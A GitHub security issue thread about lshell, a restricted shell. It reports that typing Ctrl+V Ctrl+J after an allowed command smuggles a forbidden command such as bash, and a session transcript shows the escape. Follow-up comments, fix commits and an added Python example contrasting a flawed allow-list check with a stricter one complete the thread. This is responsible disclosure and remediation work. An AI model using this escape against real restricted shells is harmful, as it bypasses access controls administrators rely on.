SECURITY ISSUE: Escape possible using special keys #149

Closed
Snawoot opened this issue Aug 17, 2016 · 4 comments

@Snawoot
commented Aug 17, 2016

Just type <CTRL+V><CTRL+J> after any allowed command and then type the desired restricted command:

vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash

@Snawoot Snawoot changed the title SECURITY ISSUE: Escape possible by using special keys SECURITY ISSUE: Escape possible using special keys Aug 18, 2016

@ghantoos

Owner

commented Aug 21, 2016

Hi @Snawoot!

Thanks for reporting these major security issues. I am unfortunately away from my PC until tomorrow night. I'll do my best to work on this asap.

I also saw your Debian bug reports, as I am the Debian maintainer for lshell.

Cheers!

@ghantoos ghantoos added the security label Aug 22, 2016

@ghantoos ghantoos closed this in e72dfcd Aug 22, 2016

@ghantoos

Owner

commented Aug 22, 2016

@Snawoot can you confirm that this fixes the issue you reported? Thanks! :)

@Snawoot

Author

commented Aug 22, 2016

@ghantoos Fix confirmed, thank you!

ghantoos pushed a commit that referenced this issue Aug 25, 2016

Ignace Mouzannar
[security] parse quoted strings for possible commands (Closes #148, Closes #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commit also corrects a previous omitted correction regarding the
control characters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
@ghantoos

Owner

commented Aug 25, 2016

Reopening as issue is still there, using other control characters. See #148.

@ghantoos ghantoos reopened this Aug 25, 2016

ghantoos added a commit that referenced this issue Aug 25, 2016

[security] parse quoted strings for possible commands #147, #148, #149
Closes #148, Closes #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commit also corrects a previous omitted correction regarding the
control characters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
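
The failure mode reported in this issue, as an added example that is not lshell's code and not part of the original thread: a hypothetical allow-list check that inspects only the first word of the line, next to a stricter check that rejects control characters before parsing. It assumes <CTRL+V><CTRL+J> inserts a literal line feed (0x0A) into the input and that the line is later handed to a shell that treats a newline as a command separator; the function names are illustrative and only the control-character case is covered.

```python
import shlex

# Allowed commands as listed by '?' in the session above.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}


def naive_check(line):
    """Hypothetical flawed check: only the first word of the raw line."""
    words = line.split()
    return bool(words) and words[0] in ALLOWED


def control_chars(line):
    """Return the control characters (C0 range and DEL) found in line."""
    return [c for c in line if ord(c) < 0x20 or ord(c) == 0x7F]


def strict_check(line):
    """Reject control characters first, then allow-list the command word."""
    bad = control_chars(line)
    if bad:
        codes = ", ".join("0x%02x" % ord(c) for c in bad)
        return False, "control character(s): " + codes
    try:
        words = shlex.split(line)
    except ValueError as exc:  # e.g. unbalanced quotes
        return False, "unparsable: %s" % exc
    if not words:
        return False, "empty"
    if words[0] not in ALLOWED:
        return False, "forbidden command: " + words[0]
    return True, "ok"


# Constructed sample inputs; "\n" stands for the literal line feed
# assumed to be inserted by <CTRL+V><CTRL+J>.
SAMPLES = ["echo hello", "bash", "echo\nbash", "ls\t-l\x0bbash"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), naive_check(sample), strict_check(sample))
```

The naive check accepts `"echo\nbash"` because its first word is allowed, while the strict check refuses the line as soon as it sees 0x0A.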